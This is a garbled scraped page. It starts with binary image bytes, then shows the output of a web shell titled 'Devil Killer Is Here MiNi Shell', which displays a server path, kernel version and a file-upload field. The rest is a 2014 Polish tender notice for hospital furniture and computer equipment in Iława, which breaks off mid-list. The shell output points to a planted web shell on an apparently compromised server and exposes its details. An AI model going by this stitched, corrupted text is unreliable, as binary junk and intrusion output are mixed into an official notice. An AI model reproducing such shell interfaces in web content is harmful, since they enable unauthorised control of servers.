JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141006/330498-N-2014.html

<p class="kh_header"><b>Iława: Przedmiotem zamówienia jest dostawa wyposażenia dla Oddziału Neurologicznego i Oddziału Udarowego z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 35/2014)</b><br>
<b>Numer ogłoszenia: 330498 - 2014; data zamieszczenia: 06.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa wyposażenia dla Oddziału Neurologicznego i Oddziału Udarowego z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 35/2014).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyposażenia dla Oddziału Neurologicznego i Oddziału Udarowego z podziałem na 3 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 35/2014)

2. W skład przedmiotu zamówienia wchodzi :
Zadanie nr 1 Meble
Zadanie nr 2 Zestawy komputerowe
Zadanie nr 3 Pozostałe wyposażenie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 39.10.00.00-3, 30.20.00.00-1, 33.19.10.00-5, 39.11.20.00-0, 42.51.32.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmiany treści umowy czasowe lub trwałe w trakcie jej obowiązywania, 
w przypadku:
1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
1.2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
1.3.w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
1.5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian. W przypadku zmiany podatku VAT cena brutto pozostaje bez zmian zmianie ulega cena netto.
1.6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
2.	Wprowadzenie zmian określonych w ust. 1 wymaga uzasadnienia 
konieczności zmiany 
i porozumienia stron oraz sporządzenia aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2014 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lada dwustanowiskowa - lada do intensywnej terapii w kształcie podkowy z nadstawkami; dwa stanowiska do pracy; szafka 80 cm z 5 szufladami; szafka 40 cm z 5 szufladami; 2 stanowiska pod PC; dostosowana do zabudowy szklanej; wykonana w systemie stelaża aluminiowego	850/1085/1220/
/1095/500	Szt.	1
2	Lada dwustanowiskowa - recepcyjna wymiary lady: szer. 180 cm, gł. Całkowita 70 cm, gł. Blatu 60 cm, wys. Całkowita 109 cm, wys. Blatu 72 cm - wykonana z płyt wiórowych trzywarstwowych wg DIN 68765 o grubośći 18 mm i 25 mm pokrytych obstronnie melaminą. Gęstość płyty: 720 kg/m3. Klasa higieniczności E1.Boki oklejone PVC 2 mm. Pod blatem zamocowany uchwyt wiszący na komputer i półka na klawiaturę, w blacie zainstalowana przelotka na kable. Na froncie lady panel z zielonego Lacobelu lub równoważny, przyklejany. Kolor płyty: biały struktura groszkowa. Akcesoria: uchylne koryta kablowe mocowane pod blatem, pojedyncze uchwyty na kable do płyty.	1800/700/1090	Szt.	1
3	Szafka recepcyjna - pięć szuflad  jedna wysoka, cztery niskie - szafka wykonana z płyt wiórowych trzywarstwowych wg DIN 68765 o grubośći 16 mm, 18 mm i 25 mm pokrytych obstronnie melaminą. Gęstość płyty: 720 kg/m3. Klasa higieniczności E1. Boki oklejone PVC 2 mm. Kolor płyty biały struktura groszkowa.  Na froncie panel z zielonego Lacobelu lub równoważny, przyklejany. Konstrukcja wieńcowa, wieniec górny wystający w stosunku do boków i wieńca dolnego o grubości płyty użytej do konstrukcji frontów szuflad, wieniec dolny wpuszczany pomiędzy boki. Plecy wpuszczane w wieńce i boki, plecy z płyty 18 mm pokrytej obustronnie melaminą. Fronty szuflad wpuszczane pod wieniec górny i nakładane na wieniec dolny i boki korpusu. Obrzeża oklejone taśmą PCV o grubości 2 mm w kolorze zbliżonym do płyty. Cokół nieznacznie cofnięty w stosunku do korpusu szafki. Szuflady zaopatrzone w zamki. Uchwyty aluminiowe nabijane - długość uchwytu równa długości frontu szuflady.	950/450/1200	Szt.	1
4	Szafka recepcyjna - trzy szuflady i półka półka i 3 szuflady- jedna wysoka, dwie niskie - szafka wykonana z płyt wiórowych trzywarstwowych wg DIN 68765 o grubośći 16 mm, 18 mm i 25 mm pokrytych obstronnie melaminą. Gęstość płyty: 720 kg/m3. Klasa higieniczności E1. Boki oklejone PVC 2 mm. Kolor płyty biały struktura groszkowa. Na froncie panel z zielonego Lacobelu lub równoważny, przyklejany. Konstrukcja wieńcowa, wieniec górny wystający w stosunku do boków i wieńca dolnego o grubości płyty użytej do konstrukcji frontów szuflad, wieniec dolny wpuszczany pomiędzy boki. Plecy wpuszczane w wieńce i boki, plecy z płyty 18 mm pokrytej obustronnie melaminą. Fronty szuflad wpuszczane pod wieniec górny i nakładane na wieniec dolny i boki korpusu. Obrzeża oklejone taśmą PCV o grubości 2 mm w kolorze zbliżonym do płyty. Cokół nieznacznie cofnięty w stosunku do korpusu szafki. Szuflady zaopatrzone w zamki. Uchwyty aluminiowe nabijane - długość uchwytu równa długości frontu szuflady.	950/450/1200	Szt.	1
5	Szafka zabiegowa stojąca  pełne drzwi - szer. 60- cm, wykonana w systemie stelaża aluminiowego 	600/560/850	Szt.	1
6	Szafka zabiegowa stojąca pełne drzwi - szer. 80cm, wykonana w systemie stelaża aluminiowego	800/560/850	Szt.	2
7	Szafka zabiegowa stojąca pełne drzwi - szer. 45 cm	450/560/850	Szt.	1
8	Szafka zabiegowa stojąca z szufladami- 45- cm, czteroszufladowa, wykonana w systemie stelaża aluminiowego	450/560/850	Szt.	1
9	Szafka zabiegowa pod zabudowę zlewozmywak jednokomorowy z ociekaczem, wykonana w systemie stelaża aluminiowego 	800/560/850	Szt.	1
10	Szafa zabiegowa z szufladami stojąca - szer. 80 cm, pięcioszufladowa, wykonana w systemie stelaża aluminiowego	800/560/850	Szt.	1
11	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 5, 6, 7, 8, 9, 10)	 	Szt.	1
12	Szafka zabiegowa wisząca  pełne drzwi - szer. 80 cm, wykonana w systemie stelaża aluminiowego	800/300/600	Szt.	1
13	Szafka zabiegowa wisząca przeszklone drzwi - szer. 80 cm, wykonana w systemie stelaża aluminiowego	800/300/600	Szt.	2
14	Szafka zabiegowa wisząca pełne drzwi - szer. 60  cm, wykonana w systemie stelaża aluminiowego 	600/300/600	Szt.	1
15	Szafka zabiegowa pod zabudowę zlewozmywak jednokomorowy z ociekaczem, wykonana w systemie stelaża aluminiowego 	800/560/850	Szt.	1
16	Szafka zabiegowa stojąca  pełne drzwi - szer. 60- cm, wykonana w systemie stelaża aluminiowego 	600/560/850	Szt.	3
17	Szafka zabiegowa stojąca z szufladami- 45- cm, czteroszufladowa, wykonana w systemie stelaża aluminiowego	450/560/850	Szt.	2
18	Szafka zabiegowa stojąca pełne drzwi - szer. 80cm, wykonana w systemie stelaża aluminiowego	800/560/850	Szt.	4
19	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 15,16,17,18)	 	Szt.	1
20	Szafka zabiegowa wisząca przeszklone drzwi  - szer. 60 cm, wykonana w systemie stelaża aluminiowego 	600/300/600	Szt.	2
21	Szafka zabiegowa wisząca pełne drzwi - szer. 60  cm, wykonana w systemie stelaża aluminiowego 	600/300/600	Szt.	1
22	Szafka zabiegowa wisząca przeszklone drzwi - szer. 80 cm, wykonana w systemie stelaża aluminiowego	800/300/600	Szt.	1
23	Szafka  zabiegowa wisząca, przeszklone drzwi - szer. 45cm, wykonana w systemie stelaża aluminiowego 	450/300/600	Szt.	4
24	Szafka zabiegowa wisząca  pełne drzwi - szer. 80 cm, wykonana w systemie stelaża aluminiowego	800/300/600	Szt.	3
25	Szafa zabiegowa pełne drzwi z półkami, wykonana w systemie stelaża aluminiowego  	800/500/2000	Szt.	1
26	Biurko z szufladami i szufladą na klawiaturę, wykonane w systemie stelaża aluminiowego 	1200/600/850	Szt.	1
27	Szafka zabiegowa pod zabudowę zlewozmywak jednokomorowy, wykonana w systemie stelaża aluminiowego  	600/560/850	Szt.	1
28	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 27)	 	Szt.	1
29	Szafka  pod zabudowę zlewozmywak jednokomorowy z ociekaczem	800/560/850	Szt.	3
30	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 29)	800/600/28	Szt.	3
31	Komoda dwuszufladowa	800/500/1100	Szt.	3
32	Stolik okolicznościowy	600/600/600	Szt.	3
33	Szafka  pod zabudowę zlewozmywak jednokomorowy 	600/560/850	Szt.	2
34	Blat zmywalny + listwy wykończeniowe do szafki (dla poz. 33)	 	Szt.	2
35	Szafa ubraniowa z podziałem na odzież czysta i brudną z dodatkowymi półkami	500/550/2300	Szt.	4
36	Biurko z szufladami i szufladą na klawiaturę	1200/600/750	Szt.	9
37	Szafa biurowa stojąca  podzielona na trzy części, dolna część drzwi pełne,środkowa odkryta, górna część drzwi pełne 	800/450/2200	Szt.	8
38	Szafa biurowo - odzieżowa	800/450/2200	Szt.	1
39	Szafka kuchenna pod zabudowę zlewozmywak jednokomorowy z ociekaczem 	800/560/850	Szt.	1
40	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 39)	 	Szt.	1
41	Szafa przelotowa, tył z drzwiami przesuwnymi ze stali nierdzewnej	970/530/2000	Szt.	1
42	Blat ze stali nierdzewnej z kołnierzem	465/1500	Szt.	1
43	Onko podawcze ze stali nierdzewnej	500/700	Szt.	1
44	Szafka kuchenna pod zabudowę zlewozmywak dwukomorowy, wykonana w systemie stelaża aluminiowego  	800/560/850	Szt.	1
45	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 44)	 	Szt.	1
46	Szafka kuchenna pod zabudowę zlewozmywak dwukomorowy, wykonana w systemie stelaża aluminiowego  	800/560/850	Szt.	1
47	Szafka kuchenna stojąca z 2 szufladami, szafka z drzwiczkami- szer. 90 cm, wykonana w systemie stelaża aluminiowego  	900/560/850	Szt.	3
48	Szafka kuchenna stojąca z 2 szufladami, szafka z drzwiczkami- szer.60 cm, wykonana w systemie stelaża aluminiowego  	600/560/850	Szt.	1
49	Blat zmywalny + listwy wykończeniowe dla wszystkich szafek stojących (dla poz. 46,47,48)	 	Szt.	1
50	Szafka kuchenna wisząca pełne drzwi  - szer. 90 cm, wykonana w systemie stelaża aluminiowego  	900/300/600	Szt.	1
51	Szafka kuchenna wisząca pełnne drzwi - szer.60 cm, wykonana w systemie stelaża aluminiowego  	600/300/600	Szt.	1
52	Regał na baseny; wykonanie ze stali nierdzewnej	800/400/1800	Szt.	1
53	Szafka wisząca z pełnymi drzwiami - szer. 80 cm	800/300/600	Szt.	1
54	Szafa z drzwiami przesuwnymi	1430/600/2000	Szt.	1
55	Szafy zamykane na klucz - z nadstawką	1150/500/2500	Szt.	2
56	Szafa dla 6 pacjentów - wykonana w systemie stelaża aluminiowego	1240/146/620	Szt.	1
57	Szafa dla 3 pacjentów - wykonana w systemie stelaża aluminiowego	1200/850/550	Szt.	4
58	Szafa dla 3 pacjentów - wykonana w systemie stelaża aluminiowego	1040/1100/550	Szt.	1
59	Szafa dla 4 pacjentów - wykonana w systemie stelaża aluminiowego	900/1400/550	Szt.	1
60	Szafa dla 4 pacjentów - wykonana w systemie stelaża aluminiowego	800/1200/550	Szt.	1
61	Szafa dla 2 pacjentów - wykonana w systemie stelaża aluminiowego	800/850/550	Szt.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestawy komputerowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw komputerowy (komputer + monitor)	
obudowa: mini lub midi tower,
Pamięć ram: 4GB,
Dysk twardy: min. 500GB,
Napęd DVD: nagrywarka,
Procesor o wydajności mierzonej w PASSMARKu(dane ze strony http://www.cpubenchmark.net/ na dzień 11.08.2014) min. 4000 punktów,
Monitor: LED lub LCD, min. 20, rozdzielczość natywna FullHD (1920 x 1080, paramatry komputera muszą umożliwiać sprawną pracę przy tej rozdzielczości),
Akcesoria: niezbędne okablowanie zasilające i sygnałowe, konieczne do pracy komputera, mysz USB, klawiatura USB, listwa zasilająca (min. 1,8 metra, 5 gniazd),
Karta muzyczna: zintegrowana,
Złącza USB: 6 (4 z tyłu, 2 z przodu),
Gwarancja: min. 24 miesiące,
Komputer musi być kompatybilny z systemami operacyjnymi: Windows 7,8,8.1, Linux (min. CentOS, Fedora),
Zastosowanie komputera: komputer biurowy,
Zasilacz komputera dostosowany mocą i wydajnością do podzespołów komputera, musi posiadać zabezpieczenia:OVP (zabezpieczenie przeciwprzepięciowe), SCP (zabezpieczenie przeciwzwarciowe),OPP (zabezpieczenie przeciwprzeciążeniowe).	zestaw	6
2.	Drukarka laserowa monochromatyczna	
Technologia druku: Laserowa, monochromatyczna,
Obsługiwane formaty papieru: A4, A5, A6, B5,
Podajnik papieru: 250 arkuszy,
Odbiornik papieru: 150 arkuszy,
Szybkość druku w mono: 33 str./min,
Maksymalna rozdzielczość druku: 1200 x 1200 dpi,
Miesięczne obciążenie: 50000 str./miesiąc,
Druk dwustronny (dupleks): Automatyczny,
Interfejsy: USB 2.0, LAN (Ethernet),
Dołączone akcesoria: Kabel zasilający, kabel USB, patchcord min. 3m (kat5.e lub 6), zapas tonerów konieczny do wydrukowania 20000 stron.
Obsługiwane systemy operacyjne: Windows XP, Vista, 7, 8, 8.1, Linux (min. Centos, Fedora).
Gwarancja: min. 12 miesięcy.	Szt.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pozostałe wyposażenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sofa - wersalka 	
